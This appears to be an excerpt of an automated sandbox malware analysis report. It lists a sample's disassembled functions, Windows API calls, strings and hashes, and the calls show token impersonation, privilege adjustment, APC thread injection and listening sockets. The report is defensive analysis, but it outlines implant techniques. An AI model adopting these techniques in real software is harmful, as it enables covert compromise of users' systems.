                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                • CreateProcessA.KERNEL32 ref: 00671013
                • GetLastError.KERNEL32 ref: 0067101D
                • GetCurrentDirectoryW.KERNEL32 ref: 00671374
                • GetCurrentDirectoryW.KERNEL32 ref: 00671388
                • CreateProcessWithTokenW.ADVAPI32 ref: 006713D1
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                • String ID:
                • API String ID: 3044875250-0
                • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                • Instruction ID: ddd496feb17ee8c2b893683ede9fb43acc4ce5d056f1b139581cf5cf7671d55c
                • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                • Instruction Fuzzy Hash: EA619B72214B40D6EB20DF25E89435E73A6F749B94F10812AEA4E87B18DF7DC8A5CB50
                Function 00679220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0067924F
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • _snprintf.LIBCMT ref: 00679267
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • FindFirstFileA.KERNEL32 ref: 00679272
                • free.LIBCMT ref: 0067927E
                  • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                  • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                  • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                • malloc.LIBCMT ref: 006792CE
                • _snprintf.LIBCMT ref: 006792E6
                • free.LIBCMT ref: 0067930E
                • FindNextFileA.KERNEL32 ref: 00679327
                • FindClose.KERNEL32 ref: 00679338
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                • String ID: %s\*
                • API String ID: 2620626937-766152087
                • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                • Instruction ID: b9f7dc96f4b337169066c32773aa2e023003f420f908839e69a4b092d4227770
                • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                • Instruction Fuzzy Hash: 5831D5113046C255DA15AB636C207B97BA7B74AFE0F88C125DEED0BB96CE39C563C314
                Function 00401A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • RtlCaptureContext.KERNEL32 ref: 00401A84
                • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                • GetCurrentProcess.KERNEL32 ref: 00401B34
                • TerminateProcess.KERNEL32 ref: 00401B42
                • abort.MSVCRT ref: 00401B48
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                • String ID: @5E
                • API String ID: 4278921479-727458683
                • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                Function 00673A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32 ref: 00673ACE
                • GetProcAddress.KERNEL32 ref: 00673ADE
                  • Part of subcall function 00673984: malloc.LIBCMT ref: 006739C2
                  • Part of subcall function 00673984: free.LIBCMT ref: 00673A45
                • CreateToolhelp32Snapshot.KERNEL32 ref: 00673B10
                • Thread32Next.KERNEL32 ref: 00673B7A
                • Sleep.KERNEL32 ref: 00673B90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 1427994231-1374908105
                • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                • Instruction ID: 173fb5629102f313e9d9874a9f15bb623e96bfa68c595a2679f6e732873ab5c7
                • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                • Instruction Fuzzy Hash: 1A418B32701B519AEB20CB62E8407ED73B6FB58B88F54812ADE4D97B18EF39C645C744
                Function 00676A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonsioctlsocketlistensocket
                • String ID:
                • API String ID: 1767165869-0
                • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                • Instruction ID: 20277dcdf1c343fd712384b8841c0a27075375c39bd243faa5f60102d07d7b9e
                • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                • Instruction Fuzzy Hash: 89112631310B5482DB248F16E420359B762F788FA4F858634EE5E53B64CF3DD456C700
                Function 00676670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                • String ID:
                • API String ID: 3910169428-0
                • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                • Instruction ID: d8364017e29b8a6f0fc31d9fb4209b82eade7849c5e9f444018a36658612b3d4
                • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                • Instruction Fuzzy Hash: 0111B135311B4097D7249F21E8243997762F788BA4F958239DE1A43794DF3DC95AC740
                Function 0067DF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0067DCC0: RevertToSelf.ADVAPI32 ref: 0067DCDD
                • LogonUserA.ADVAPI32 ref: 0067DF98
                • GetLastError.KERNEL32 ref: 0067DFA2
                  • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                  • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                  • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                • ImpersonateLoggedOnUser.ADVAPI32 ref: 0067DFC0
                • GetLastError.KERNEL32 ref: 0067DFCA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                • String ID: %s\%s
                • API String ID: 3621627092-4073750446
                • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                • Instruction ID: c23be3ee67aa09ac1aac6bdd0082120723da9cefab7562a0a514cdcd65bd2716
                • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                • Instruction Fuzzy Hash: 1A318B30314B4191EB40FB22F86435A23A7FB8AB80F804029EA4E57F66DF3EC165CB45
                Function 0066FA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountSleepTick$closesocket
                • String ID:
                • API String ID: 2363407838-0
                • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                • Instruction ID: 225c3144836ed55f75402d078613cef5556b0c92f46d9bf16291872aee3931d8
                • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                • Instruction Fuzzy Hash: A711D221704A8092CA50EB62F45521AA392F785BF0F444735FEBE47BE6DE3CC6468B45
                Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                • GetCurrentProcessId.KERNEL32 ref: 004019E0
                • GetCurrentThreadId.KERNEL32 ref: 004019E8
                • GetTickCount.KERNEL32 ref: 004019F0
                • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                • String ID:
                • API String ID: 1445889803-0
                • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                Function 0067EE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonslistensocket
                • String ID:
                • API String ID: 564772725-0
                • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                • Instruction ID: 7639010fca12233a93f18edaacb0714942ccd48183b1a2ce934c52e116504c89
                • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                • Instruction Fuzzy Hash: 8D110435614B5582DB20EF12E82531AB362F788FE0F548665EE9D07FA4DF7EC1198704
                Function 0066D83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: %s!%s
                • API String ID: 0-2935588013
                • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                • Instruction ID: 339d4963c7e48f7d5eab9816edd3ce58a4595f6ab105ea75f3ca995b74269556
                • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                • Instruction Fuzzy Hash: A2518D76B04A80C6DB24DF66D0406A97362F388FD8F84852AEF8E57758DF38C942C744
                Function 00670B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • LookupPrivilegeValueA.ADVAPI32 ref: 00670BEA
                • AdjustTokenPrivileges.ADVAPI32 ref: 00670C1A
                • GetLastError.KERNEL32 ref: 00670C24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                • String ID: %s
                • API String ID: 4244140340-620797490
                • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                • Instruction ID: 2d8aa08465468c05ae3a8d0ae3c732c9e61822b2c26229a58da37efd2c490324
                • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                • Instruction Fuzzy Hash: 8C217C72B00B01AAEB14DB71D4557ED73B6F758B88F84852A9E4C93B48EF74C629C390
                Function 00675854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON
                Download Yara Rule
                APIs
                • GetTickCount.KERNEL32 ref: 0067587B
                • Sleep.KERNEL32 ref: 006758CA
                • GetTickCount.KERNEL32 ref: 006758D0
                • WSAGetLastError.WS2_32 ref: 006758DA
                  • Part of subcall function 00675A20: ioctlsocket.WS2_32 ref: 00675A42
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$ErrorLastSleepioctlsocket
                • String ID:
                • API String ID: 1121440892-0
                • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                • Instruction ID: fcd2c79b4b1f667fb8cce6bcefae5cc02d7a34ed8ad0a29df97c4b622c4aa0d8
                • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                • Instruction Fuzzy Hash: 77316B36B00F40D6DB00DBA2E4942AC77BAF388B90F51466ADE6E93B94DE31C555C344
                Function 001CB7B0 Relevance: 5.9, Strings: 4, Instructions: 884COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $<$ailure #%d - %s$e '
                • API String ID: 0-963976815
                • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction ID: 875dd6fd0587a974ac1acf23bae3dc22a9181987aed168fd786f8758df7145ac
                • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction Fuzzy Hash: 7D92D3B2329A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB44
                Function 0066DA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00676114: htonl.WS2_32 ref: 00676131
                • GetLastError.KERNEL32 ref: 0066DD33
                  • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                • HeapCreate.KERNEL32 ref: 0066DCDA
                • HeapAlloc.KERNEL32 ref: 0066DCF8
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                • String ID:
                • API String ID: 3419463915-0
                • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                • Instruction ID: 52fe5b68eb4c93ed57c1751ba93f5dd3d32ebf759edd96eaf3318f5250c8f75b
                • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                • Instruction Fuzzy Hash: 21E1B1B3B10B4187EB64DB35E8413AA63A2F799794F088125DB8E97B55EF3DE446C300
                Function 00402314 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: signal
                • String ID:
                • API String ID: 1946981877-0
                • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                Function 0068C3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $<
                • API String ID: 0-428540627
                • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction ID: 029e6c0c50f8178ac7a0873f28322fe44d81e9b0db15bd0f8f991eaa75d97d41
                • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction Fuzzy Hash: DE92D1B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                Function 001CC397 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ailure #%d - %s$e '
                • API String ID: 0-4163927988
                • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction ID: ec6c28a2629b973ec245a2b5201f0cb2fca8ea9cd88e4a8d25ed745c8d90d11e
                • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction Fuzzy Hash: A7510AB6214A508BD714CB09E4E076AB7E1F3CCB94F84561AE38B8B768DB3CD545CB40
                Function 001CCFF0 Relevance: .6, Instructions: 617COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction ID: 82b5d1063a700ef63de224473fde504350dfbea355db83ab48aaa914c7c492b6
                • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction Fuzzy Hash: 235241B221898587D708CB1CE4A177AB7E1F3C9B80F44852AE79B8B799CE3DD554DB00
                Function 0068DBF0 Relevance: .6, Instructions: 617COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction ID: bc1ccaeb1530266df738040eaae3fae955189e00e07f680a2e6a2761b34d835d
                • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction Fuzzy Hash: 7E5250B22149458BD708CB1CE4A173AB7E2F3C9B80F44852AE7978BB99CE3DD555CB40
                Function 001CC680 Relevance: .6, Instructions: 592COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction ID: ce355b0243cb639f74432b96568eac3b2256156551a439938dfd84188c558197
                • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction Fuzzy Hash: CA5240B22149818BD708CF1DE4A177AB7E1F3C9B80F44852AE78A8B799CA3DD545CF40
                Function 0068D280 Relevance: .6, Instructions: 592COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction ID: 5164de9d090b26616ad0d3930c8619f64b1833a30633e82543ad9ecf93fad533
                • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction Fuzzy Hash: 485255B22145808BD708CF1DE4A173AB7E2F3C9B80F44852AE7968BB99CA3DD555CF40
                Function 001A9680 Relevance: .4, Instructions: 404COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                • Instruction ID: 0e5a797c056a3b603dc5714ecbf7d852c9887fbf52f5745a24cee88d7c1c311a
                • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                • Instruction Fuzzy Hash: 65E1D87A718A4296DF30DB25E4906AE73A1F7AA798F900115EF4D87748EF38CD85CB40
                Function 0066A280 Relevance: .4, Instructions: 404COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                • Instruction ID: 97788dc11d1859d5af95f783d0f149c7900d8f14816fea1324a533bb0f57b2cf
                • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                • Instruction Fuzzy Hash: ACE1D776318A4296DB20CBA5E4902AE67B3F795788F904115EF4DA7708EF39CE06CF41
                Function 001ACE3C Relevance: .4, Instructions: 374COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                • Instruction ID: 478000ad0292b6d07a9389f9cf01eca55c7dab24efc3bc0c4dde27ee49546022
                • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                • Instruction Fuzzy Hash: D4E19CB6B10B4187EB24CB35E8413AA63A2F799795F488125DB8F97B51EF3CE485C340
                Function 001A916C Relevance: .4, Instructions: 367COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
